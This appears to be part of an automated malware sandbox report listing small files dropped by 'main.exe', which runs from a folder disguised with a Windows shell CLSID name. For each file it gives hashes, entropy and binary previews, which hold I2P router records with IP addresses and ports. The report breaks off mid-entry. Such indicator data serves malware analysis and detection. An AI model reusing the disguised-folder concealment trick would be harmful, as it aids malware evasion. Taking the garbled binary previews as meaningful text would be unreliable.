O.................q............NTCP2.w.host=.101.191.73.121;.i=.txqSj6anL5W4XsdsvVUJ7Q==;.port=.18088;.s=,W3zZyy4EEHcFrpX7PXJlzpKMp7gIFLglu2Qk3F86tU4=;.v=.2;..........NTCP2.@.caps=.6;.s=,W3zZyy4EEHcFrpX7PXJlzpKMp7gIFLglu2Qk3F86tU4=;.v=.2;..........SSU2...caps=.BC;.host=.101.191.73.121;.i=,cELFWj-d2o2kLe9Tkt7ApCk9lAaeHhJyrT0XuO5NSU8=;.port=.18088;.s=,vD0thQ5GP-AGrf6No2uiXMyAz52Iha3psKkX9D7j~zY=;.v=.2;..........SSU2...caps=.6;.i=,cELFWj-d2o2kLe9Tkt7ApCk9lAaeHhJyrT0XuO5NSU8=;.iexp0=.1726478701;.iexp1=.1726478699;.iexp2=.1726478692;.ih0=,wxFXwJ85g1CYuwlVd-W1d-Wj9PnDzIfWNks6l6mzC4k=;.ih1=,GcHz7OnlTPN0QrTW2NyKLs~ljcCMfV
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):803
Entropy (8bit):6.6553585670206585
Encrypted:false
SSDEEP:12:zGa+dznZkkZRiFVbOS/rX0tF2iu5iY4ph1IAu:HEiSg5OirX4FuEFu
MD5:4A16ECA0AAC76613DAE9DD08CBCCB7E1
SHA1:863D9BB7433FFBB87BF68D6B5BCFE23428123456
SHA-256:5EE79B7E7AFE3D0DD4F1E07BBE32C11CF708B834D6B389C34ED816C13EB8C76A
SHA-512:2C1009D84DB202DFAEFF7724401D05FCB5B564BC6A2B8BE9434E949B41E493C18A8C758F0955EEC5CBB431B3F1947A61938EBE979D878670ADC0E0D5B00E1D5B
Malicious:false
Preview:.b8.4f.5.u.rS=P;Y.94.....&-e%........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.....TA....mJt..A0|..g.b.e..................;%...........SSU2...caps=.B;.host=.85.6.171.9;.i=,32q9nrD5OtvPVi2XD1AFA2q90SY2oHqCj1s9fWJLbLs=;.port=.19675;.s=,~4G1ZDC39kCpDxtSmSGxsfBkKqaJEi8-A-in-qW0kVc=;.v=.2;..........NTCP2.s.host=.85.6.171.9;.i=.~wSV0-rLHGdsVVgrK9XpIw==;.port=.19675;.s=,3nYT~6Wj9jorJvj6GfWpKANgfEECsZgrA~nTfBzW6Gc=;.v=.2;..,.caps=.PR;.netId=.2;.router.version=.0.9.63;..2:....O.PD?...*..[(c..AVz...M......H..z.z{..b..)....H5R.....
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):811
Entropy (8bit):6.75936237396757
Encrypted:false
SSDEEP:12:029hjuuguuguuguuguuguuguuguuguuguuxMvUWGbidXdaXBHATqKCK0aTah3WOc:N9hj+++++++++fAKO0XZ6qK8d3Wl
MD5:6EE4C829C3B713D5447094FD7A44204E
SHA1:C3FD51E4005272A6AF43755E840FF428DB4E1E48
SHA-256:7E44E1D419ED38E6EBD76095B77C6A147213CFA3C4DB7457F66715C81A892146
SHA-512:BC8C0BB65B40D4C07B40EA805D1208B7B0E7E4FA16561FA99AC092898EC7950F1ABE938734F1F2962290C31FF24704A0F4365C675593010E3D19307F93015939
Malicious:false
Preview:......W..7.U.Ob..j.....Mw.J}?...c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\..c}.|.[e.....q:#K../CVX....Q..\".<.V...&.(.+.H5...PJ........."...........................NTCP2.v.host=.31.13.134.204;.i=.~9TRNyX5sx1czvWNmxzGHQ==;.port=.25275;.s=,zodNIQddX0Ji3tNZkjdrLZloqzmA-Rh0uwIYCEj-3jI=;.v=.2;..........SSU2...caps=.BC;.host=.31.13.134.204;.i=,X~5p50ZlGUVBa4Fh7R5zhsh9n6Mc1HC8LgDMrZSGMyQ=;.port=.25275;.s=,Gyo-3bs1yPp0bM793bjsK1RI3x86dBbVyXBYCC5QxhY=;.v=.2;..-.caps=.XRD;.netId=.2;.router.version=.0.9.63;n...u....?..I...ps:i...r.".]l..-.'nC^..S..B-/+..1.wLt.r9*.sD..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1249
Entropy (8bit):6.752031390891208
Encrypted:false
SSDEEP:24:4TefefefefefefefefefeWQiEorLDpLU0W8FkQJ9v3xLDb303v5x:sqqqqqqqqqnEoPJU0WRec3v7
MD5:806C400BFFDFC5D5EFE7D926A125772C
SHA1:BC7424C805FC3A57A1BDCDABA4FB74B46B362604
SHA-256:D50C92BBA89B08533A65AE197AD9BDFA5E9494952EF3D55D5DEC3EC552CC87F5
SHA-512:F9F23A9757C3BD732C5FE05466354DDC455AEB58D389597A683767A5D1FC986C30D5E9C64C7E02F37762ED7813A2663E1D9FBC592CF89E1A90F17E0A9D2EE6B4
Malicious:false
Preview:Ra$.#W..56\......&Q.?..<......WL.Y......!.4........|<.J.&+....Y......!.4........|<.J.&+....Y......!.4........|<.J.&+....Y......!.4........|<.J.&+....Y......!.4........|<.J.&+....Y......!.4........|<.J.&+....Y......!.4........|<.J.&+....Y......!.4........|<.J.&+....Y......!.4........|<.J.&+....Y......!.4........|<.J.&+...C.|w8&.].:6sd.,)..z.l...4.;.Wey.............iJ...........NTCP2.@.caps=.4;.s=,UnxOpmxX6Q6VwnPGWokD87UmxQEaZ2RtzG7EYzz530w=;.v=.2;..........NTCP2.@.caps=.6;.s=,UnxOpmxX6Q6VwnPGWokD87UmxQEaZ2RtzG7EYzz530w=;.v=.2;..........SSU2.|.caps=.4;.i=,PmFgx0bIrd3ZQGj6OhMwuyKgAprLXJ1a7~z-aACvok4=;.iexp0=.1726478250;.iexp1=.1726478246;.iexp2=.1726478246;.ih0=,L3WS69O400AFmvzrOI7EGxlKnujsETrg2EmlhDMBG~k=;.ih1=,D8MoPkTh1eOUyMzb1FCzadXtpyoVplkisOBtmaOpiyQ=;.ih2=,2esD5kvXsYDXAGNpYa2BMPS0W6v2XhzG2hrif2boH4Q=;.itag0=.1360373990;.itag1=.3542820782;.itag2=.3088341306;.s=,o5wIIQLntiR8RgkAE3vf4Wcv3QnrK9yEf2K0gIokyRY=;.v=.2;..........SSU2.q.caps=.6;.i=,PmFgx0bIrd3ZQ
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):810
Entropy (8bit):6.623619052942211
Encrypted:false
SSDEEP:12:kd9p1Yq1Yq1Yq1Yq1Yq1Yq1Yq1Yq1Yq1YfMC8AFQ5PBfECZIYvJdn:O9YKYKYKYKYKYKYKYKYKYf78HB8CZ9Jd
MD5:31DA7EC6D09DF019326253BE622A31EA
SHA1:C1622FB7DFB7806269EE7CED57986CBA00A225C0
SHA-256:CF87E1812AC79A896D8702D787221E45C52CA644C197A89398F64E3923E965FA
SHA-512:A7F7D83A26AF811234EE4FAB4E543F15053A4632426C9BA58590104E246FE878816008132410DF1DFC1055F9C5288D002111368E48BD69762492FA3EA54D454D
Malicious:false
Preview:...l3LW..e....[!=D..p.........wv..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X...........n.B....z(..V.Z.g..a[..R7...........................NTCP2.v.host=.86.106.93.104;.i=.CiQ2Iy5TIYpJm3vhXYBEcw==;.port=.14840;.s=,RVNf4wuelS1x7NgZx8DgUYYe-~rE0kNTkG62g6guTyE=;.v=.2;..........SSU2...caps=.BC;.host=.86.106.93.104;.i=,5Nm6Xu3vgc651c50vftSWfcQxyLfEcjgU0URE8738B0=;.port=.14840;.s=,i9eRqyoLXmnQgTjxCNqzwrylf1U2MpzHudvs4Cc6FzU=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;N.e..."rMy..!..#.y....Ww.[..h..L.R......Z.Do.&.7.J.*.|N(afL.B.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1183
Entropy (8bit):6.71357417480828
Encrypted:false
SSDEEP:24:32T4m4m4m4m4m4m4m4m4mFlPmm/g2Ynw+2YTjuSkOi1n9uJkOi1ZsYx8F:32tdv/g2+z2GbACAGYo
MD5:CE835FE7926DDA3DB35B9065F57F9D45
SHA1:7CF7EA18E9D713C6965FE39C98C8E50CB204163D
SHA-256:6E6EE010D3642E509E5B82ACF5F8781F1110EC455D4D475B13C762B20000B825
SHA-512:AD532D79F4A39073FA1FED71A8FB1A96181BD92DF7F39B5149BE09BAE79169D2D2CE621838CE0FDC8C7E67D59985491402567997F5E61CA97CD8471D49620414
Malicious:false
Preview:w.O..:...-.8.....:L.(.{..C..J..E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R.H.%q6;b....Y...i(.G..._e\.I#.0.[........................NTCP2.v.host=.141.98.234.85;.i=.WUClqi459aEah7FpA~HDpQ==;.port=.42069;.s=,EdFy3l-jAOjf7s8nPtYX4lxP9uV~kJ-SPkwPYX3YBWw=;.v=.2;..........NTCP2.z.host=.2a05:541:111:4::1;.i=.WUClqi459aEah7FpA~HDpQ==;.port=.42069;.s=,EdFy3l-jAOjf7s8nPtYX4lxP9uV~kJ-SPkwPYX3YBWw=;.v=.2;..........SSU2...caps=.BC;.host=.141.98.234.85;.i=,~ayapkVjM8CDB4pWvva~FzmoBtovNIYqHMqinO3UyhI=;.port=.42069;.s=,vJr72hwNystVEw1InD4delli~iBAcJiWvmN5YtBePSw=;.v=.2;..........SSU2...caps=.BC;.host=.2a05:541:111:4::1;.i=,~ayapkVjM8CDB4pWvva~FzmoBtovNIYqHMqinO3UyhI=;.mtu=.1500;.port=.42069;.s=,vJr72hwNystVEw1InD4delli~iBAcJiWvm
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):808
Entropy (8bit):6.715404310788116
Encrypted:false
SSDEEP:12:gzxM+3YYYYYYYYY3Ph62rUUI4iUIf73oqzvag79pwgsURNbN:gNMAYYYYYYYYY3xNPGYqbvhLbN
MD5:F3A5CB11825D35D7D84A114720F13EF6
SHA1:3A6126EAAB637917024685DF5FB88BBAC7CB1E7F
SHA-256:7BD9C4157292BA5FA5E9114CD6D7FC92EF2406CB9DDC6B43B06C568A69822FE4
SHA-512:A7829088012079E21804D952279DEE27BF3548CE1FDFCE6E1FA8C0704E8461999DE53F26F214854AE5F43D310FED94828C103890F3FED59C304D44A2FD8992D8
Malicious:false
Preview:.6R.E.^.@.D N..F........\.......L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....X.R..H..}..oLG'.).2.Z.l.@..4.............b............NTCP2.u.host=.107.189.6.31;.i=.GcUDkqhzJoOM037IX18z4Q==;.port=.23012;.s=,MJdRJmdJYDHNugZNUjGGJg23n6Fr6dogZreEGNy~ERo=;.v=.2;..........SSU2...caps=.BC;.host=.107.189.6.31;.i=,20ayZ~X1LcKUDjrvTE2coLmh2MVvsuuIXUidQy8Ffiw=;.port=.23012;.s=,~08d~Tn1fsSLSXtUM0Nz9u35oAL7VxpsgP3ZXF5tb1Q=;.v=.2;..,.caps=.OR;.netId=.2;.router.version=.0.9.62;..C{._.... BR....S....5G.ua2...2..1=..<.1.ek.1+.>..S...u...
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):811
Entropy (8bit):7.36869069738508
Encrypted:false
SSDEEP:12:w+6yRegTnHI+wKWm/6fCtYLscSgXhDtLekIBJxytLekXyrJOyFpL7hqj+EWH:wjyRzHQKWmxGL8cDtfI5ytfXygG
MD5:7AD32A38EE4CB29887601DCD01568F70
SHA1:3C6AA28AC95A9E32695D88C4118E1ED26DA92DD5
SHA-256:6BEF8E13A4BA2A260666A84A39FC0B4EE59820361FEE1FEFAD4C4B0228F806E5
SHA-512:E0742DE931D010DB403A2BEB213A8E9ABBD8C5DA15E42DD94283FE0E1052F2E2068835C6CA6972C6850AD9E4B0C10E6AED2215804C603D1C28F309AE76E292B7
Malicious:false
Preview:w.k#..[.@.....`lB;#.....G!...r.>y......'+o.6.......XK.g..%...w..M..............E..i~.....{79t.8. -...b.4_X......D.e.8]6.6I...l..<x.:..x.."e....{..+~C.........@........y.~..A.S.b2H..+.....q.#.S.u.dihM......)U...3vg.1x .Q6... h"....c1..R.%.Zd......Vj...i)t.......B.>.U.b...uA.5)?......Q.vA.+...E...".\.NF.....^J...R.m..L.:.^...GE?d....jO,.'uA.4.NzO.-.J.6gPp.&.D1.............................NTCP2.v.host=.198.37.222.72;.i=.8EUJxzKWvpyB3B5qclUjZA==;.port=.25083;.s=,XynNsUpOL8fjopqvLMaCnZBWLWmlnYf-KVns3XfT1nM=;.v=.2;..........SSU2...caps=.BC;.host=.198.37.222.72;.i=,vcKr-eRB3NsSmvsOlVgNzt8N3ura66Fi2aOotZGBP~A=;.port=.25083;.s=,GueA2WcpE233t3M798uWxoaH3ngzbCbHpqarILcc0Dc=;.v=.2;..-.caps=.PRE;.netId=.2;.router.version=.0.9.63;.S.p.\...\%..*!...Z....CE4..@..3I.'.Q..._V...f8.....M|.0....G.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):810
Entropy (8bit):6.697573301874222
Encrypted:false
SSDEEP:12:WB2d76vCvCvCvCvCvCvCvCvCdlDV9bI3wy0h3f/69bISF4SszrA/TvUWn:WMB6666666666dlDVTyyH6dF4Sgs/bL
MD5:915BC5E3F3236F94DD6CECECE21A20CB
SHA1:65C1C453242D078ED31F08350C5E0E4ABF508B13
SHA-256:042F9DFA9F15DF9DC795F903A11977288C36158916A257DDB1E117BF81BAAF0B
SHA-512:0120326A436514E2A59E807206C06F018DC5245BF11719A46ADCCE46E8EB2E428B41F4654D5508FE94DEDFC696E8C932C59747C6EE37796DF9FD859AD97604C7
Malicious:false
Preview:,...~."....*..[.X.v.. 3D..:|...~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U......(Z.....-.g.\..[......I..b0..........................SSU2...caps=.BC;.host=.154.61.58.162;.i=,u0N6SN5HoALaEDr1ul4oB89yDcL2wZF4NunLu5WJa6I=;.port=.23154;.s=,KChyxLmfkJKN0D2jQCpVUCWxuf-jJMt4A2OrneZHXEw=;.v=.2;..........NTCP2.v.host=.154.61.58.162;.i=.QK5jCWCC3I1JOWDSbhqbUg==;.port=.23154;.s=,8AxaAUUX6vpTRN0dTdwHAsHFXUcYcrDfYwXnVkcK0H0=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;vC..Fz:.L........;Z...NQ......n...R.........:.\.BU..Kqg..p.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1081
Entropy (8bit):6.7114531589648445
Encrypted:false
SSDEEP:24:qBhzhzhzhzhzhzhzhzhzhh6qNDdnKqrOyJFS:qBJJJJJJJJJnN1iynS
MD5:5FC62C6835559036E009577281B94623
SHA1:7B9E52DF0DCF3F3156944F7687FB39DD110A301C
SHA-256:DB3B59622DBF9D990F55E67F4A85CB6BB272D5892D35B2132BEC877A6CA95D10
SHA-512:49BA8E3A9465F709BF8B9C7CCA98EA512C1F4A3C8DB60E2F98B77190358B9B08E54369CC345BD029E09A319498033DA0B79042D4DFCD770EF308C0F4EF214460
Malicious:false
Preview:..i2.9..s+.\...oFP0....>Y..4\!B...R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e............U.2..<g...(y.$...R6..LXF. ..............m............NTCP2.@.caps=.4;.s=,RM6b04kmn0wdvJVZnGgbGs-9~O55Ezh6ZHkBrlYsmEs=;.v=.2;..........NTCP2...host=&2a02:4540:7045:88a8:4a6e:c4e0:755a:29c;.i=.kIADeCvNdU88gMAdXmhjXQ==;.port=.25194;.s=,RM6b04kmn0wdvJVZnGgbGs-9~O55Ezh6ZHkBrlYsmEs=;.v=.2;..........SSU2.q.caps=.4;.i=,fUNLnFn~81KdNTLBhHSJImRGozClqOtu1O-pTEAiwHk=;.s=,thqgM2btB9G~Z-QDWqDycOYthKjjWnOH9if0uHplISc=;.v=.2;..........SSU2...caps=.BC;.host=&2a02:4540:7045:88a8:4a6e:c4e0:755a:29c;.i=,fUNLnFn~81KdNTLBhHSJImRGozClqOtu1O-pTEAiwHk=;.mtu=.1500;.port=.25194;.s=,thqgM2btB9G~Z-QDWqDycOYthKjjWnOH9if0uHplISc=;.v=.2;..,.caps=.PU;.netId=.2;.router
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1165
Entropy (8bit):6.7403172500578465
Encrypted:false
SSDEEP:12:gpRrdMiiiiiiiii0tz/FIk812TObEyw5GIXhNvUX2DPUKJLQQCTTNgfeXHcA/z8M:gpRrAYF2oE15fvUX8PUGLCvNce3cdG20
MD5:02732EA9730272F6BFF913676A081288
SHA1:0369124F2633252913C9DCE1B26B8B4BE6EAAEDF
SHA-256:449716DB17C2D2092E5609C1DA0BB8179F97B1409DD2C2E166B1560210B3D9D2
SHA-512:C3A2BC50BFD83B631D0C32E07F04D6026687E79B2141F6800FCDC2EEC77E3D51992287EE0315E9250DE263700C6F0E0E89ED54BF08777B222760FD28957C378E
Malicious:false
Preview:...6zB....gwr2..w..T...2=}V;7{...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...2.....mQM.w7.O#..jwg8)lo.R/...............z...........NTCP2.@.caps=.4;.s=,luXoav965FYJXmxHgYC-uLnArcqaFUC~-nvIr6ppDTo=;.v=.2;..........SSU2.-.caps=.4;.i=,vr7C-cIr5DWOZEkT9Eb~fncZMK-2rYy6KO3sKhRH~cA=;.iexp0=.1726474404;.iexp1=.1726474494;.iexp2=.1726474910;.iexp3=.1726476573;.iexp4=.1726477732;.ih0=,6PZWFOLqMqbKRNbbhwzUt0nicAj3C-JCIEyb12PSBt4=;.ih1=,n6W-sg6JjYoIGkViNYuPbrRqhPyKaCmi9fzJ669gGSE=;.ih2=,x5IrBCNg3-2i5NbhtCQzpTSo-MfIBDpXx3rTET0s5cs=;.ih3=,1raAFupalt1-5x8W9gXdcXlxBiM35C8ff1wMYFrDVqw=;.ih4=,5zKjqFGA6rkrojYRzBY3flFRJfkIMlyYnyuf7dQ8QuM=;.itag0=.641564569;.itag1=.3621157672;.itag2=.4064067248;.itag3=.1218885772;.itag4=.3399425411;.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1019
Entropy (8bit):6.759679690412713
Encrypted:false
SSDEEP:24:++0Bfet7et7et7et7et7et7et7et7et7etJ/QCNOt/RKIqh8WK3qh884LEyE:+bpYLqaX3qa38
MD5:661BCE6BCD0885BBFEF8A40631D60580
SHA1:74F1F604E9AA60775FD6207E3D37699A6D8C22C7
SHA-256:987BAFED043AD4DEF3E692A9DF5E8C40C819174E792A51E54A9562233EFFE8FC
SHA-512:DED29218EEB192E42C0281A72D9CBFE3E3F94147C3930D66617D349C5345E362182065DF0285560D9A5123DDF8383282AD07D58FDC4286353E8F9EDC95203B28
Malicious:false
Preview:....{.~...l.#..%......Q.~.....3.+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p..].q..l..-..D|.Qo2.$...V: x|.;.............J............NTCP2.u.host=.2.177.52.177;.i=.6y7lddThoIGOwOsMJAy5AA==;.port=.14810;.s=,gLb3wAK9LmnvJ8tfp95hcD-i5vAFPRZOWhZjEjHq3Fg=;.v=.2;..........NTCP2.@.caps=.6;.s=,gLb3wAK9LmnvJ8tfp95hcD-i5vAFPRZOWhZjEjHq3Fg=;.v=.2;..........SSU2...caps=.BC;.host=.2.177.52.177;.i=,qHxy2sQWP4yq2P-8OUZGcESzWHjZdCduYiLzQVX36Vk=;.port=.14810;.s=,x64PA8b4r7pcUWbj7Tdeks91i~Z5iyzwc2dI76KJC2I=;.v=.2;..........SSU2.q.caps=.6;.i=,qHxy2sQWP4yq2P-8OUZGcESzWHjZdCduYiLzQVX36Vk=;.s=,x64PA8b4r7pcUWbj7Tdeks91i~Z5iyzwc2dI76KJC2I=;.v=.2;..-.caps=.PRE;.netId=.2;.router.version=.0.9.63;}....E...c.7.z=dW.'...,...........W6).Al
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):810
Entropy (8bit):6.740796435234308
Encrypted:false
SSDEEP:24:uO8hyPGPGPGPGPGPGPGPGPGPKYRhLqFepIr3OhLFN2gbDnH:uO8hSYRiQa3O1vDH
MD5:8E011BBC0F03DD159EB9A83E5A98B71F
SHA1:DF7236C66D68F19E5F976224A6A9180255EA26F3
SHA-256:9218EEDB41A9DE472CE052AC4A8A45079731B7FCBA503C849E002BCBE92C4A3B
SHA-512:361471552FBA8A387198809BD74C98EE80910A5D1D62BB9F6955B36F852E205EE223FDDCFD9023F00A11617DA05A96A746B4E6C5BF32B1C20696120B5299433F
Malicious:false
Preview:..ezj.....u.Y..4PL.DJj..~?b.*..s...\...m........R.C...~..|.s...\...m........R.C...~..|.s...\...m........R.C...~..|.s...\...m........R.C...~..|.s...\...m........R.C...~..|.s...\...m........R.C...~..|.s...\...m........R.C...~..|.s...\...m........R.C...~..|.s...\...m........R.C...~..|.s...\...m........R.C...~..|...7mAN.M..86.s..f...7QTv...................}...........SSU2...caps=.BC;.host=.188.89.23.222;.i=,EaMjzFWLy4Dbl7GN24030BwS-XnHpO1UK7mF7K8ADZk=;.port=.19229;.s=,olggNl2AeXJmcFcrB-7nlo8hVy8YDtLRWNH6sWFooyY=;.v=.2;..........NTCP2.v.host=.188.89.23.222;.i=.Cncsx5tu-EZe6RWS~2ixxA==;.port=.19229;.s=,Gft4Y03ydgvVd-ANulVUqbe5bXoacRzend6uRS~qr2E=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.63;......i...].........<wGB`Zx]..`....\.........H......Iq...h..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1165
Entropy (8bit):6.664404206054663
Encrypted:false
SSDEEP:24:61wO555555555mZAwtv2aFUAtv2adJjhivUPJjhJI:6t555555555uATfDCLPNI
MD5:514DB50F2B47F473CFC4AD0FBDE77C9A
SHA1:9728D9F974806FA3CACBCF32B1A1EF904B32CCD7
SHA-256:985DC2E973018A66B2B25DFB608194AE92DA3BF2136481997CBC1394F6677882
SHA-512:54C9E825A04410B53009F1CF5988C720E83D1FEBC382DC90E3C357BEE6F76C32FCC53B84284EDBC0F4339711B5A30F4C04D9DB7CCAB3DFB1F92FC33C565D9F7E
Malicious:false
Preview:._...K..5.)q.O.qB..w.T?...I9x]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h......gS3....<j.|7....q..#Y.............................SSU2...caps=.BC;.host='2a02:1748:dd4e:f060:82ee:73ff:fe51:b953;.i=,iHlj9Zze15sS-EHS2yQWOql8Cf1SXBdW8sNgufjAR3w=;.port=.25107;.s=,CkKVpW-~W0HUZ1yaPy7JEGF~OcSP3zVMlNqMFs7sxAA=;.v=.2;..........SSU2...caps=.BC;.host=.185.128.245.162;.i=,iHlj9Zze15sS-EHS2yQWOql8Cf1SXBdW8sNgufjAR3w=;.port=.25107;.s=,CkKVpW-~W0HUZ1yaPy7JEGF~OcSP3zVMlNqMFs7sxAA=;.v=.2;..........NTCP2...host='2a02:1748:dd4e:f060:82ee:73ff:fe51:b953;.i=.lEsGDVaMFBAvavChAlaWSQ==;.port=.25107;.s=,46nykQSwr3Tf3R9rahJ2Dl39guOOyETYsSmB8CjVYlQ=;.v=.2;..........NTCP2.x.host=.185.128.245.162;.i=.lEsGDVaMFBAvavChAlaWSQ==;.port=.25107;.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1354
Entropy (8bit):6.690373158991511
Encrypted:false
SSDEEP:24:zh4N4N4N4N4N4N4N4N4N4Yb0X2IsCg0X2Isqg9P17/TgIP1oy280X2IsMZr+xeiN:V4N4N4N4N4N4N4N4N4N4YbpRTpRTdGy1
MD5:0B89A1CD8EE1B6DCBFF4A5E1CE022F62
SHA1:84DA689BAE144A47DB6586C99B8131D9772F2D87
SHA-256:4378B64B629DEC883A027D5BB667A27D0A9DD9B325904F7D41C3361A7D47EB53
SHA-512:901E15A7DC1E525DBB9283ECA6AEFC9DE867CB71B57A7653E8B28A08884C666D2CDD76B3AC4C1F2F4BC981E199F8A034E6FB50A8529E3062667660CCA4570FF4
Malicious:false
Preview:.;..?h..Q.t....)........M.%%...&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..i.../...L..4J..X.....)KF...u...........$..............NTCP2.v.host=.85.239.52.241;.i=.F96vpb5EqevVmLQLeKNtYQ==;.port=.28764;.s=,FeHZpV3M9PaesSBcUwI77-b-TqlVLs7evmZc6IGNInA=;.v=.2;..........NTCP2...host=.2a10:1fc0:5::9e6f:2659;.i=.F96vpb5EqevVmLQLeKNtYQ==;.port=.28764;.s=,FeHZpV3M9PaesSBcUwI77-b-TqlVLs7evmZc6IGNInA=;.v=.2;..........SSU2...caps=.BC;.host=.85.239.52.241;.i=,f~jAbSLkBKsCIRBgmtAPUId~e2kQkq493Ikuwu-dpks=;.port=.28764;.s=,ZFUZx6QsH1ZQpGQUmDXLu0~PFpfX2n~MZ0YVku8L5SQ=;.v=.2;..........SSU2...caps=.BC;.host=.2a10:1fc0:5::9e6f:2659;.i=,f~jAbSLkBKsCIRBgmtAPUId~e2kQkq493Ikuwu-dpks=;.mtu=.1500;.port=.28764;.s=,ZFUZx6QsH1ZQpGQUmDXLu0~P
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1198
Entropy (8bit):6.717112239083693
Encrypted:false
